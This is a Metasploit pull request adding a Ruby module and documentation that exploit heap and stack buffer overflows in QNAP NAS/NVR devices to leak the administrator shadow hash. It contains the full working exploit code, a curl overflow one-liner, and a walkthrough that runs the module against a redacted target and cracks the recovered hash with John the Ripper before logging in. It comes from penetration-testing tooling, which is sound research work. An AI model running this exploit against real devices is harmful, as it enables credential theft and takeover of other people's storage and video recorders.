### PR TITLE
Add QNAP NAS/NVR administrator hash disclosure

### DIFF
--- a/documentation/modules/auxiliary/gather/qnap_backtrace_admin_hash.md
+++ b/documentation/modules/auxiliary/gather/qnap_backtrace_admin_hash.md
@@ -68,3 +68,11 @@ wvu@kharak:~$
 ```
 
 Cracked! Now you can log in to the device. Shells await!
+
+## Addendum
+
+I used this `curl` command to test for offsets:
+
+```
+curl -kvA "" "https://[redacted]/cgi-bin/cgi.cgi?u=admin&p=$(perl -e 'print "A"x2000' | base64 -w 0)"
+```

--- a/documentation/modules/auxiliary/gather/qnap_backtrace_admin_hash.md
+++ b/documentation/modules/auxiliary/gather/qnap_backtrace_admin_hash.md
@@ -1,0 +1,70 @@
+## Intro
+
+This is going to be a quick rundown of how to use this module to
+retrieve the admin hash from a vulnerable QNAP device.
+
+The defaults I've set should be adequate for blind exploitation, but you
+may need to tweak them for your target.
+
+## Options
+
+**OFFSET_START**
+
+You want to set this to a value where you can see a backtrace. Set this
+lower if you're not sure. Default is 2000.
+
+**OFFSET_END**
+
+Set this option to a value where you don't see a backtrace. Set this
+higher if you're not sure. Default is 5000.
+
+**RETRIES**
+
+Sometimes the attack won't be successful on the first run. This option
+controls how many times to retry the attack. Default is 10.
+
+**VERBOSE**
+
+This will tell you how long the binary search took and how many requests
+were sent during exploitation. Default is false.
+
+## Usage
+
+Let's run through a successful exploitation. I've tailored the options
+to my target. Your target may differ.
+
+```
+msf > use auxiliary/gather/qnap_backtrace_admin_hash 
+msf auxiliary(qnap_backtrace_admin_hash) > set rhost [redacted]
+rhost => [redacted]
+msf auxiliary(qnap_backtrace_admin_hash) > set offset_end 3000
+offset_end => 3000
+msf auxiliary(qnap_backtrace_admin_hash) > set verbose true
+verbose => true
+msf auxiliary(qnap_backtrace_admin_hash) > run
+
+[*] QNAP [redacted] detected
+[*] Binary search of 2000-3000 completed in 5.02417s
+[*] Admin hash found at 0x8068646 with offset 2920
+[+] Hopefully this is your hash: $1$$vnSTnHkIF96nN6kxQkZrf.
+[*] 11 HTTP requests were sent during module run
+[*] Auxiliary module execution completed
+msf auxiliary(qnap_backtrace_admin_hash) > 
+```
+
+We got lucky on this run. Sometimes it takes a couple retries to get the
+hash. Now what do we do with it...
+
+```
+wvu@kharak:~$ john --wordlist --rules --format=md5crypt shadow
+Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 SSSE3 20x])
+Press 'q' or Ctrl-C to abort, almost any other key for status
+hunter2          (admin)
+1g 0:00:00:01 DONE (2017-03-15 04:41) 0.8928g/s 24839p/s 24839c/s
+24839C/s flipper2..mercury2
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+wvu@kharak:~$ 
+```
+
+Cracked! Now you can log in to the device. Shells await!

--- a/documentation/modules/auxiliary/gather/qnap_backtrace_admin_hash.md
+++ b/documentation/modules/auxiliary/gather/qnap_backtrace_admin_hash.md
@@ -74,5 +74,5 @@ Cracked! Now you can log in to the device. Shells await!
 I used this `curl` command to test for offsets:
 
 ```
-curl -kvA "" "https://[redacted]/cgi-bin/cgi.cgi?u=admin&p=$(perl -e 'print "A"x2000' | base64 -w 0)"
+curl -kv "https://[redacted]/cgi-bin/cgi.cgi?u=admin&p=$(perl -e 'print "A"x2000' | base64 -w 0)"
 ```

--- a/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
+++ b/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
@@ -43,8 +43,8 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options([
       Opt::RPORT(443),
-      OptInt.new('OFFSET_START', [true, 'Starting offset (crash)', 2000]),
-      OptInt.new('OFFSET_END',   [true, 'Ending offset (no crash)', 5000]),
+      OptInt.new('OFFSET_START', [true, 'Starting offset (backtrace)', 2000]),
+      OptInt.new('OFFSET_END',   [true, 'Ending offset (no backtrace)', 5000]),
       OptInt.new('RETRIES',      [true, 'Retry count for the attack', 10])
     ])
   end
@@ -63,7 +63,6 @@ class MetasploitModule < Msf::Auxiliary
       end
 
       @target = (xml.at('//platform').text == 'TS-NASX86' ? 'x86' : 'ARM')
-
       vprint_status("QNAP #{info[0]} #{info[1..-1].join('-')} detected")
 
       Exploit::CheckCode::Detected

--- a/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
+++ b/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
@@ -45,10 +45,6 @@ class MetasploitModule < Msf::Auxiliary
       OptInt.new('OFFSET_END',   [true, 'Ending offset (no crash)', 5000]),
       OptInt.new('RETRIES',      [true, 'Retry count for the attack', 3])
     ])
-
-    register_advanced_options([
-      OptBool.new('DEBEUG', [false, 'Print debugging messages', false])
-    ])
   end
 
   def check
@@ -176,8 +172,6 @@ class MetasploitModule < Msf::Auxiliary
   def send_request(m, ret = nil)
     @cnt = @cnt.to_i + 1
 
-    print_debeug(m)
-
     payload = Rex::Text.encode_base64(
       Rex::Text.rand_text(1) * m +
       (ret ? ret : Rex::Text.rand_text(4))
@@ -193,11 +187,6 @@ class MetasploitModule < Msf::Auxiliary
       }
     )
 
-    if res
-      print_debeug(res.request)
-      print_debeug(res.headers)
-    end
-
     res
   end
 
@@ -206,12 +195,6 @@ class MetasploitModule < Msf::Auxiliary
       if name.include?('glibc detected')
         @offset = val.split[-2].to_i(16)
       end
-    end
-  end
-
-  def print_debeug(msg = '')
-    if datastore['DEBEUG']
-      print_line("%bld%cya[!]%clr #{msg}")
     end
   end
 

--- a/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
+++ b/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
@@ -18,8 +18,6 @@ class MetasploitModule < Msf::Auxiliary
         A binary search is performed to find the correct offset for the BOFs.
         Since the server forks, blind remote exploitation is possible, provided
         the heap does not have ASLR.
-
-        Note: you may need to bump RETRIES (default is 3) if the attack fails.
       },
       'Author'         => [
         'bashis',      # Vuln/PoC
@@ -47,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
       Opt::RPORT(443),
       OptInt.new('OFFSET_START', [true, 'Starting offset (crash)', 2000]),
       OptInt.new('OFFSET_END',   [true, 'Ending offset (no crash)', 5000]),
-      OptInt.new('RETRIES',      [true, 'Retry count for the attack', 3])
+      OptInt.new('RETRIES',      [true, 'Retry count for the attack', 10])
     ])
   end
 

--- a/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
+++ b/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary
         Since the server forks, blind remote exploitation is possible, provided
         the heap does not have ASLR.
 
-        Note: you may need to bump RETRIES (default is 0) if the attack fails.
+        Note: you may need to bump RETRIES (default is 3) if the attack fails.
       },
       'Author'         => [
         'bashis',      # Vuln/PoC
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
     register_options([
       OptInt.new('OFFSET_START', [true, 'Starting offset (crash)', 2000]),
       OptInt.new('OFFSET_END',   [true, 'Ending offset (no crash)', 5000]),
-      OptInt.new('RETRIES',      [true, 'Retry count for the attack', 0])
+      OptInt.new('RETRIES',      [true, 'Retry count for the attack', 3])
     ])
 
     register_advanced_options([

--- a/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
+++ b/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
@@ -65,7 +65,11 @@ class MetasploitModule < Msf::Auxiliary
       @target = (xml.at('//platform').text == 'TS-NASX86' ? 'x86' : 'ARM')
       vprint_status("QNAP #{info[0]} #{info[1..-1].join('-')} detected")
 
-      Exploit::CheckCode::Detected
+      if Gem::Version.new(info[1]) < Gem::Version.new('4.2.3')
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Detected
+      end
     else
       Exploit::CheckCode::Safe
     end

--- a/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
+++ b/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
@@ -37,10 +37,14 @@ class MetasploitModule < Msf::Auxiliary
         ['x86',       'Description' => 'x86 target', offset: 0x16b2],
         ['ARM',       'Description' => 'ARM target', offset: 0x1562]
       ],
-      'DefaultAction'  => 'Automatic'
+      'DefaultAction'  => 'Automatic',
+      'DefaultOptions' => {
+        'SSL'          => true
+      }
     ))
 
     register_options([
+      Opt::RPORT(443),
       OptInt.new('OFFSET_START', [true, 'Starting offset (crash)', 2000]),
       OptInt.new('OFFSET_END',   [true, 'Ending offset (no crash)', 5000]),
       OptInt.new('RETRIES',      [true, 'Retry count for the attack', 3])

--- a/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
+++ b/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
@@ -1,0 +1,218 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'QNAP NAS/NVR Administrator Hash Disclosure',
+      'Description'    => %q{
+        This module exploits combined heap and stack buffer overflows for QNAP
+        NAS and NVR devices to dump the admin (root) shadow hash from memory via
+        an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace.
+
+        A binary search is performed to find the correct offset for the BOFs.
+        Since the server forks, blind remote exploitation is possible, provided
+        the heap does not have ASLR.
+
+        Note: you may need to bump RETRIES (default is 0) if the attack fails.
+      },
+      'Author'         => [
+        'bashis',      # Vuln/PoC
+        'wvu',         # Module
+        'Donald Knuth' # Algorithm
+      ],
+      'References'     => [
+        ['URL', 'http://seclists.org/fulldisclosure/2017/Feb/2'],
+        ['URL', 'https://en.wikipedia.org/wiki/Binary_search_algorithm']
+      ],
+      'DisclosureDate' => 'Jan 31 2017',
+      'License'        => MSF_LICENSE,
+      'Actions'        => [
+        ['Automatic', 'Description' => 'Automatic targeting'],
+        ['x86',       'Description' => 'x86 target', offset: 0x16b2],
+        ['ARM',       'Description' => 'ARM target', offset: 0x1562]
+      ],
+      'DefaultAction'  => 'Automatic'
+    ))
+
+    register_options([
+      OptInt.new('OFFSET_START', [true, 'Starting offset (crash)', 2000]),
+      OptInt.new('OFFSET_END',   [true, 'Ending offset (no crash)', 5000]),
+      OptInt.new('RETRIES',      [true, 'Retry count for the attack', 0])
+    ])
+
+    register_advanced_options([
+      OptBool.new('DEBEUG', [false, 'Print debugging messages', false])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/cgi-bin/authLogin.cgi'
+    )
+
+    if res && res.code == 200 && (xml = res.get_xml_document)
+      info = []
+
+      %w{modelName version build patch}.each do |node|
+        info << xml.at("//#{node}").text
+      end
+
+      @target = (xml.at('//platform').text == 'TS-NASX86' ? 'x86' : 'ARM')
+
+      vprint_status("QNAP #{info[0]} #{info[1..-1].join('-')} detected")
+
+      Exploit::CheckCode::Detected
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def run
+    if check == Exploit::CheckCode::Safe
+      print_error('Device does not appear to be a QNAP')
+      return
+    end
+
+    admin_hash = nil
+
+    (0..datastore['RETRIES']).each do |attempt|
+      vprint_status("Retry #{attempt} in progress") if attempt > 0
+      break if (admin_hash = dump_hash)
+    end
+
+    if admin_hash
+      print_good("Hopefully this is your hash: #{admin_hash}")
+      report_note(
+        host: rhost,
+        port: rport,
+        type: 'qnap.admin.hash',
+        data: admin_hash
+      )
+    else
+      print_error('Looks like we didn\'t find the hash :(')
+    end
+
+    vprint_status("#{@cnt} HTTP requests were sent during module run")
+  end
+
+  def dump_hash
+    l = datastore['OFFSET_START']
+    r = datastore['OFFSET_END']
+
+    start = Time.now
+    t     = binsearch(l, r)
+    stop  = Time.now
+
+    time = stop - start
+    vprint_status("Binary search of #{l}-#{r} completed in #{time}s")
+
+    if action.name == 'Automatic'
+      target = actions.find do |tgt|
+        tgt.name == @target
+      end
+    else
+      target = action
+    end
+
+    return if t.nil? || @offset.nil? || target.nil?
+
+    offset = @offset - target[:offset]
+
+    find_hash(t, offset)
+  end
+
+  def find_hash(t, offset)
+    admin_hash = nil
+
+    # Off by one or two...
+    2.times do
+      t += 1
+
+      if (res = send_request(t, [offset].pack('V')))
+        if (backtrace = find_backtrace(res))
+          token = backtrace[0].split[4]
+        end
+      end
+
+      if token && token.start_with?('$1$')
+        admin_hash = token
+        addr       = "0x#{offset.to_s(16)}"
+        vprint_status("Admin hash found at #{addr} with offset #{t}")
+        break
+      end
+    end
+
+    admin_hash
+  end
+
+  # Shamelessly stolen from Knuth
+  def binsearch(l, r)
+    return if l > r
+
+    @m = ((l + r) / 2).floor
+
+    res = send_request(@m)
+
+    return if res.nil?
+
+    if find_backtrace(res)
+      l = @m + 1
+    else
+      r = @m - 1
+    end
+
+    binsearch(l, r)
+
+    @m
+  end
+
+  def send_request(m, ret = nil)
+    @cnt = @cnt.to_i + 1
+
+    print_debeug(m)
+
+    payload = Rex::Text.encode_base64(
+      Rex::Text.rand_text(1) * m +
+      (ret ? ret : Rex::Text.rand_text(4))
+    )
+
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => '/cgi-bin/cgi.cgi',
+      #'vhost'    => 'Q',
+      'vars_get' => {
+        'u'      => 'admin',
+        'p'      => payload
+      }
+    )
+
+    if res
+      print_debeug(res.request)
+      print_debeug(res.headers)
+    end
+
+    res
+  end
+
+  def find_backtrace(res)
+    res.headers.find do |name, val|
+      if name.include?('glibc detected')
+        @offset = val.split[-2].to_i(16)
+      end
+    end
+  end
+
+  def print_debeug(msg = '')
+    if datastore['DEBEUG']
+      print_line("%bld%cya[!]%clr #{msg}")
+    end
+  end
+
+end


### PR DESCRIPTION
```
msf auxiliary(qnap_backtrace_admin_hash) > info 

       Name: QNAP NAS/NVR Administrator Hash Disclosure
     Module: auxiliary/gather/qnap_backtrace_admin_hash
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-01-31

Provided by:
  bashis
  wvu <wvu@metasploit.com>
  Donald Knuth

Available actions:
  Name       Description
  ----       -----------
  ARM        ARM target
  Automatic  Automatic targeting
  x86        x86 target

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  OFFSET_END    5000             yes       Ending offset (no backtrace)
  OFFSET_START  2000             yes       Starting offset (backtrace)
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RETRIES       10               yes       Retry count for the attack
  RHOST                          yes       The target address
  RPORT         443              yes       The target port (TCP)
  SSL           true             no        Negotiate SSL/TLS for outgoing connections
  VHOST                          no        HTTP server virtual host

Description:
  This module exploits combined heap and stack buffer overflows for 
  QNAP NAS and NVR devices to dump the admin (root) shadow hash from 
  memory via an overwrite of __libc_argv[0] in the HTTP-header-bound 
  glibc backtrace. A binary search is performed to find the correct 
  offset for the BOFs. Since the server forks, blind remote 
  exploitation is possible, provided the heap does not have ASLR.

References:
  http://seclists.org/fulldisclosure/2017/Feb/2
  https://en.wikipedia.org/wiki/Binary_search_algorithm

msf auxiliary(qnap_backtrace_admin_hash) > 
```